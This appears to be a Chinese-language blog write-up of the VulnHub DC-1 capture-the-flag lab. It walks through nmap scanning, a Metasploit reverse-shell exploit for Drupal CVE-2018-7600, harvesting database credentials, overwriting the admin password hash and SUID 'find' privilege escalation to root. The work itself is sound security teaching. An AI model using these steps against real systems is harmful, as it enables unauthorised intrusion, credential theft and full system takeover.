DC-1

前言

看博客的时候看到了DC靶机，发现这好像是一个系列的，也挺基础的，就想把DC这个系列的靶机刷一遍

环境搭建

• VirtualBox
• DC-1镜像文件

刚开始想用 VMware 的，不过发现不能正常打开，就换成了 VirtualBox

先安装好 VirtualBox

下载地址：https://www.virtualbox.org/wiki/Downloads

下载安装程序后进行安装

靶机镜像下载地址：https://www.vulnhub.com/entry/dc-1,292/

下载到一个.ova文件

用 VirtualBox 打开，导入虚拟机，设置里要改一下虚拟机的位置，默认是在C盘，其他的默认即可，然后等待导入虚拟机

导入好后启动

遇到了下面这个报错

点击更改网络设置，选择桥接网卡（或者是 NAT 模式）

然后就可以了

还有就是 kali 的网络连接也要选择桥接网卡（或者是 NAT 模式），保持和靶机的一致

渗透测试

flag1

先看看 kali 的 IP

用 nmap 扫一下这个网段存活的主机

nmap -sP 192.168.1.0/24

可以根据 VirtualBox 找到靶机的 IP 地址是192.168.1.15

然后探测一下靶机的端口服务啥的

nmap -A 192.168.1.15

先看一下 80 端口的，是 Drupal CMS

用 Wappalyzer 插件看一下，是 Drupal 7

网上搜一下有什么漏洞，可以找到存在CVE：CVE-2018-7600

直接用 kali 的 msf 打，先找一下 Drupal 模块

msfconsole
search Drupal

应该就是2018年的这个了，使用这个EXP

use exploit/unix/webapp/drupal_drupalgeddon2

配置一下，进行反弹shell

# 反弹shell的payload
set payload php/meterpreter/reverse_tcp
# 靶机IP
set rhosts 192.168.1.15
# 本机IP
set lhost 192.168.1.14
# 开始攻击
run

进入系统的shell，并生成一个交互式shell

shell
/usr/bin/script -qc /bin/bash /dev/null

看到flag1.txt

查看发现需要找一个配置文件

Every good CMS needs a config file - and so do you.

flag2

搜一下这个 CMS 的配置文件在哪

就是在：

/var/www/sites/default/settings.php

读一下可以看到flag2，还有数据库的账户和密码

/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

flag3

去连接数据库

mysql -u dbuser -pR0ck3t

看一下数据库，发现 drupaldb，切换到这个数据库

show databases;
use drupaldb;

看一下表

show tables;

在node表中看到flag3

为什么要看 node 表

drupal node机制理解：https://www.cnblogs.com/amw863/p/4551889.html

简单的说就是node表中存储了所有 “节点” 的实例记录，无论具体内容类型是博客、新闻还是论坛帖子，其标题、发布者、发布时间等基础属性都集中记录在此表中

所以要去登录管理员帐号，再看users表中的内容

select * from users;

直接看有点多，可以只看name和pass列

select name,pass from users;

密码不是明文的，是经过加密的，再去找一下加密脚本

find / -name *password*

看一看这个文件内容

cat /var/www/scripts/password-hash.sh

#!/usr/bin/php
<?php

/**
 * Drupal hash script - to generate a hash from a plaintext password
 *
 * Check for your PHP interpreter - on Windows you'll probably have to
 * replace line 1 with
 *   #!c:/program files/php/php.exe
 *
 * @param password1 [password2 [password3 ...]]
 *  Plain-text passwords in quotes (or with spaces backslash escaped).
 */

if (version_compare(PHP_VERSION, "5.2.0", "<")) {
  $version  = PHP_VERSION;
  echo <<<EOF

ERROR: This script requires at least PHP version 5.2.0. You invoked it with
       PHP version {$version}.
\n
EOF;
  exit;
}

$script = basename(array_shift($_SERVER['argv']));

if (in_array('--help', $_SERVER['argv']) || empty($_SERVER['argv'])) {
  echo <<<EOF

Generate Drupal password hashes from the shell.

Usage:        {$script} [OPTIONS] "<plan-text password>"
Example:      {$script} "mynewpassword"

All arguments are long options.

  --help      Print this page.

  --root <path>

              Set the working directory for the script to the specified path.
              To execute this script this has to be the root directory of your
              Drupal installation, e.g. /home/www/foo/drupal (assuming Drupal
              running on Unix). Use surrounding quotation marks on Windows.

  "<password1>" ["<password2>" ["<password3>" ...]]

              One or more plan-text passwords enclosed by double quotes. The
              output hash may be manually entered into the {users}.pass field to
              change a password via SQL to a known value.

To run this script without the --root argument invoke it from the root directory
of your Drupal installation as

  ./scripts/{$script}
\n
EOF;
  exit;
}

$passwords = array();

// Parse invocation arguments.
while ($param = array_shift($_SERVER['argv'])) {
  switch ($param) {
    case '--root':
      // Change the working directory.
      $path = array_shift($_SERVER['argv']);
      if (is_dir($path)) {
        chdir($path);
      }
      break;
    default:
      // Add a password to the list to be processed.
      $passwords[] = $param;
      break;
  }
}

define('DRUPAL_ROOT', getcwd());

include_once DRUPAL_ROOT . '/includes/password.inc';
include_once DRUPAL_ROOT . '/includes/bootstrap.inc';

foreach ($passwords as $password) {
  print("\npassword: $password \t\thash: ". user_hash_password($password) ."\n");
}
print("\n");

是用 PHP 脚本生成一个hash密码，所以可以利用这个脚本，对一个简单的密码（如：123456）进行加密，然后替换掉数据库中admin的密码

www-data@DC-1:/var/www$ php /var/www/scripts/password-hash.sh "123456"

password: 123456                hash: $S$D5j5RN.xHstg/J3qdVzgjxWDbnanuQeDRqk2anesGzCGma0KGXPA

然后覆盖admin的密码

update users set pass="$S$D5j5RN.xHstg/J3qdVzgjxWDbnanuQeDRqk2anesGzCGma0KGXPA" where name="admin";

然后去登录，可以成功登录进去

找一下flag3

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

flag4

用find命令找一下flag4

find / -name *flag4*

flag4是个普通用户，可以直接读

cat /home/flag4/flag4.txt

Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?

thefinalflag

所以最后就是要提权了，先看看有没有 SUID 提权的可能

find / -perm -u=s -type f 2>/dev/null

发现有find命令可以用来提权

find `which find` -exec whoami \;

或者获得交互式shell

find `which find` . -exec /bin/bash -p \;

最后到/root目录下找到最终的thefinalflag.txt

Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7

总结

总的来说这个靶机涉及到的知识点挺基础的，每个flag也都是对后面攻击方向的一个提示

就是开始时候搭建环境的时候卡了点，总是扫不到靶机的IP

知识点：

• 使用 nmap 扫描主机及端口
• CMS 指纹识别（Drupal 7）
• 使用 msf 攻击漏洞并获取shell（CVE-2018-7600）
• 信息搜集，利用密码加密脚本生成自定义密码
• 连接数据库并替换admin的密码
• 利用 find 命令进行SUID提权为root用户